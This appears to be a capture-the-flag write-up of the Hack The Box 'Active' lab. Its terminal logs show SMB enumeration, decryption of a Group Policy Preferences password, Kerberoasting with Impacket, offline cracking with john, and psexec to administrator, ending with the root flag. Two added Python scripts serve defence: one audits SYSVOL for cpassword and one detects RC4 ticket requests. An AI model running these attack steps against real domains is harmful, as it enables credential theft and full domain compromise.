Active

$ nmap -p- -T4 -A 10.10.10.100
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-15 18:46:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 12m27s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-15T18:47:12
|_  start_date: 2021-07-15T12:23:17
$ echo 10.10.10.100 active.htb | sudo tee -a /etc/hosts
$ smbclient -N -L \\\\10.10.10.100
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available
$ nullinux -shares 10.10.10.100
[*] Enumerating Shares for: 10.10.10.100
        Shares                     Comments
   -------------------------------------------
    \\10.10.10.100\ADMIN$          Remote Admin
    \\10.10.10.100\C$              Default share
    \\10.10.10.100\IPC$
    \\10.10.10.100\NETLOGON        Logon server share
    \\10.10.10.100\Replication     
    \\10.10.10.100\SYSVOL          Logon server share
    \\10.10.10.100\Users           

   [*] Enumerating: \\10.10.10.100\Replication
       .                                   D        0  Sat Jul 21 06:37:44 2018
       ..                                  D        0  Sat Jul 21 06:37:44 2018
       active.htb                          D        0  Sat Jul 21 06:37:44 2018

[*] 0 unique user(s) identified
$ smbclient -N \\\\10.10.10.100\\Replication
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                10459647 blocks of size 4096. 5727843 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (3.7 KiloBytes/sec) (average 1.6 KiloBytes/sec)

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Decrypting GPP (Group Policy Password)
https://github.com/BustedSec/gpp-decrypt
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
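The defender's counterpart to the step above is to find every such file before an attacker does: Microsoft's GPP fix (MS14-025) stopped new passwords being written into preference XML, but it left existing files in SYSVOL untouched, and a read-only share like Replication here serves them to anonymous clients. The script below is an added example, not part of this writeup or of the gpp-decrypt tool; it walks a SYSVOL copy, parses the six preference file types that could carry a `cpassword` attribute, and reports the item and account each one belongs to. The embedded `SAMPLE_GROUPS_XML` is constructed to match the Groups.xml recovered above (the `cpassword` value is the one from the page), and the `demo()` directory layout mirrors the Policies path seen in the smbclient session.

```python
"""Audit a SYSVOL copy for Group Policy Preference items that still carry a
cpassword attribute. Added example for the GPP section of this writeup; not
part of the original page or of gpp-decrypt. Standard library only."""
import os
import tempfile
import xml.etree.ElementTree as ET

# File names used by the six GPP item types that could embed a cpassword
# before MS14-025 (compared case-insensitively).
GPP_PASSWORD_FILES = {
    "groups.xml", "services.xml", "scheduledtasks.xml",
    "datasources.xml", "drives.xml", "printers.xml",
}

# Attribute on <Properties> that names the account the cpassword belongs to,
# which differs per item type (userName, accountName, runAs, username).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample with the same structure as the Groups.xml pulled from
# the Replication share above; the cpassword is the value shown on the page.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2"
        changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per preference item whose <Properties> carries cpassword."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for item in root:                      # <User>, <Group>, <Service>, <Task>, <Drive>, ...
        props = item.find("Properties")
        if props is None or props.get("cpassword") is None:
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "<unknown>")
        findings.append({
            "file": source,
            "item": item.tag,
            "name": item.get("name", ""),
            "account": account,
            "cpassword": props.get("cpassword"),
        })
    return findings


def audit_sysvol(root_dir):
    """Walk a SYSVOL (or Replication) copy and collect every cpassword finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name.lower() not in GPP_PASSWORD_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8") as fh:
                try:
                    findings.extend(find_cpasswords(fh.read(), source=path))
                except ET.ParseError as exc:
                    # A corrupt preference file still deserves a manual look.
                    findings.append({"file": path, "item": "PARSE_ERROR",
                                     "name": "", "account": str(exc), "cpassword": None})
    return findings


def demo():
    """Build a throwaway SYSVOL-shaped tree holding the sample and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpo_dir = os.path.join(tmp, "active.htb", "Policies",
                               "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                               "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo_dir)
        with open(os.path.join(gpo_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        # A constructed preference file with no cpassword must not be reported.
        with open(os.path.join(gpo_dir, "Drives.xml"), "w", encoding="utf-8") as fh:
            fh.write('<?xml version="1.0" encoding="utf-8"?><Drives>'
                     '<Drive name="H:"><Properties action="U" path="\\\\dc\\share" username=""/>'
                     '</Drive></Drives>')
        return audit_sysvol(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}: {f['item']} '{f['name']}' stores a cpassword for "
              f"{f['account']} -> delete the preference item and reset that account")
```

Run it against a mounted or copied SYSVOL tree with `audit_sysvol("/mnt/sysvol")`. Every hit means the item must be removed from the GPO and the named account's password rotated; the AES key that protects `cpassword` is published by Microsoft, so a hit is equivalent to a plaintext credential on an anonymous share, exactly as the session above shows.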
$ smbclient //10.10.10.100/Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                10459647 blocks of size 4096. 5727843 blocks available
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> type user.txt
type: command not found
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> 
Kerberoasting
$ sudo ntpdate 10.10.10.100
15 Jul 15:41:50 ntpdate[3681]: step time server 10.10.10.100 offset +747.974316 sec
kali@kali:~/0.htb/machines/Active100$ GetUserSPNs.py -request active.htb/SVC_TGS
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1c1a7790574ab0fe8152996c2197b2f3$9472e03d5ae32cb98349393bb61804d404189c48cc708428b5f50b31b8f8f585772d138dd06aeaacf93673588023f0c244770c98177bd816e34f9c56aafefe0c36019d3a8828e14eaf34768cbb20ff01d7bd426a7b5896bb250e413bb795158423ffa79a813c5c997c333e3282b83dcdee721dd994d81ea3eda7c8b94f9c5c9ec14432bd16ed63f4ed473357a91d5800634f62502ca0aa1f70b56c6122d63dcc2e24016a2608580d307faa45ba558ab4f2add5855ed886caf5d6b60bd0a6b56688f24985afd0a1fc4f3ac7affbc6074964339a5b9979d7b6c97488c6308ae24f7d2a4b3f2e22e4aecbf954f8da14b9265737cf10a30d88769a9edbf9204070ae8e49d19f59def9131a5af9d8e3ea441682bf8ed8bd2b7fd65c2bdaa5b4fac235e95cf00d7992c35430e6eeccb70947961aae183449aad314a75ab855eaaab2dbd36460079e312cb2045a745a283ad3e56573a2d24c7ec644a5897cb66436dd8c9d4c49d5b618ac65a6dffe72d565bc36b294ba18ce947715654e7b76b092be3acb440bd0e50728f483a2ffdbfa1520cf7f5c16157a0688aae27e8503e86c94dac6350b94e6ba735066b6a0d376b6071287166321b2305602f9bce695bbd83ecae99c578800b569827dc89d01784a0f64a7292c4dc35e48d7970936da7f3e180574b860f5ea3b263baf4ed73eb6936cdb565992a70c89b92fb200e80c2037bdeb909b0d9481582ed26289b72c1d8cd4ab842db214a13c6e40861565a8b1b2663a1c9bd20664d5679bf3ab36ca97819cc2ccf1294e76c1d0f71b48564ebe3df61cd6e69843dd75c8a6e8b27f08162da5db402b93ee92a5530c4a02606a9b0ecd4800a5c9447d6a8764a4b4975d0aa1199b76d5dd36918086b93f902ec38fa1f925edce86f902f4270e3faf7ae412a8f9619752256e424e8bc23098a28f0e6c320d810b50ceb0830c8afa1322faf97a5e457df4de5dd86e3c3f61bf9d5c17fb950969d3f846d5b6f61bf897980c07600f5a6fe8543c819830bab24261c509b95dafc5eee747154bd6eece0109046ab81eecfa2ed6d13928ce19bd8fb7796ae6302d68acff53262907125c8c514b94ce3ba635a5b03de237d0722a8b4b195319a1810cbba027cfe005f9818184a6f9b448a5aaddbc6167761c62b41850c359a4a80115497432b901e843eb1892b26883a0b51bc8d5a170cb0c95d82d7ba635f10d3703937f8f5e155290aee46d4c54e6e13b622a070b126f334c1f98
kali@kali:~/0.htb/machines/Active100$ 
$ john ticket.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2021-07-15 15:44) 0.2016g/s 2124Kp/s 2124Kc/s 2124KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
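The ticket John loaded above is `$krb5tgs$23$`, i.e. Kerberos etype 23 (RC4-HMAC, logged by Windows as 0x17), which is what makes it crackable offline with a wordlist. On the domain controller the same request leaves a Security event 4769 ("A Kerberos service ticket was requested") with that encryption type, and a detection for this technique is essentially a filter over those events. The following is an added example, not code from the writeup: it screens constructed 4769 records for successful RC4 ticket requests against user (not computer or krbtgt) service principals and then groups them by requesting account and client address. The event field names match the EventData of a real 4769; the timestamps, client address `10.10.14.2` and the second service account `svc_sql` are constructed, while `SVC_TGS`, `Administrator` and `DC$` are the names on the page.

```python
"""Flag Kerberoast-shaped service ticket requests in Windows event 4769 data.
Added defender-side example for the Kerberoasting section; not from the
original writeup. Input records are constructed dicts whose keys are the
EventData field names of a real 4769 event."""
from collections import defaultdict

RC4_HMAC = "0x17"          # etype 23, the "$krb5tgs$23$" John reported above
SUCCESS = "0x0"

# Constructed sample: one Kerberoast burst from 10.10.14.2 plus ordinary
# traffic that must not be reported. Only the names SVC_TGS, Administrator and
# DC$ come from the page; svc_sql and the client address are made up.
SAMPLE_4769 = [
    {"TimeCreated": "2021-07-15T18:46:20Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "10.10.14.2", "Status": "0x0"},
    {"TimeCreated": "2021-07-15T18:46:20Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "IpAddress": "10.10.14.2", "Status": "0x0"},
    # Computer-account SPN: long random password, not a Kerberoast target.
    {"TimeCreated": "2021-07-15T18:46:21Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x17",
     "IpAddress": "10.10.14.2", "Status": "0x0"},
    # Normal AES-encrypted requests from a workstation/DC.
    {"TimeCreated": "2021-07-15T18:40:02Z", "TargetUserName": "DC$@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",
     "IpAddress": "10.10.10.100", "Status": "0x0"},
    {"TimeCreated": "2021-07-15T18:41:15Z", "TargetUserName": "Administrator@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",
     "IpAddress": "10.10.10.100", "Status": "0x0"},
    # Failed request (0x7 = service principal unknown): no ticket was issued.
    {"TimeCreated": "2021-07-15T18:46:22Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "nosuchsvc", "TicketEncryptionType": "0x17",
     "IpAddress": "10.10.14.2", "Status": "0x7"},
]


def is_user_spn(service_name):
    """True for SPNs owned by user accounts, the only ones worth cracking."""
    return service_name.lower() != "krbtgt" and not service_name.endswith("$")


def flag_rc4_tgs(events):
    """Return the 4769 events that look like Kerberoast ticket requests:
    successful, RC4-encrypted, and for a user-account service principal."""
    hits = []
    for ev in events:
        if ev.get("Status", SUCCESS) != SUCCESS:
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if not is_user_spn(ev.get("ServiceName", "")):
            continue
        hits.append(ev)
    return hits


def summarize(hits):
    """Group hits by (requesting account, client address) and list the
    distinct services pulled; one client collecting RC4 tickets for several
    user SPNs in a short span is the classic GetUserSPNs.py -request shape."""
    by_client = defaultdict(set)
    for ev in hits:
        by_client[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(services) for key, services in by_client.items()}


if __name__ == "__main__":
    for (user, ip), services in summarize(flag_rc4_tgs(SAMPLE_4769)).items():
        print(f"{user} from {ip} requested RC4 service tickets for: {', '.join(services)}")
```

Two tuning notes from practice: domains that still negotiate RC4 for legacy hosts will produce noise until those hosts are moved to AES (the per-account `msDS-SupportedEncryptionTypes` setting is the control), and the real fix for the outcome seen above is that a service principal should never belong to a privileged account with a dictionary password; a managed service account or a long random password makes the cracked ticket worthless.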
$ psexec.py administrator@active.htb
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file eDuwsVAz.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service Yvrd on active.htb.....
[*] Starting service Yvrd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd \Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

C:\Users\Administrator\Desktop>